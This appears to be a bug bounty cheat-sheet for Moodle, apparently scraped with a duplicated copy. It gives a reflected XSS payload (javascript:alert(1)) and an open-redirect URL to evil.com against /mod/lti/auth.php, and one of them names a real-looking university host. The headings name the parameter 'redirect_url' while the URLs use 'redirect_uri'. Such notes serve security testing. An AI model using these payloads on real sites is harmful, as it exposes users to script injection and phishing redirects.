AllAboutBugBounty/Technologies/Moodle.md

# Moodle

1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter
```
https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
```

2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter

```
https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
```
Major Update, adding some tips 2021-07-21 15:38:57 +00:00			`# Moodle`

			`1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter`
			```
			`https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)`
			```

			`2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter`

			```
			`https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com`
			```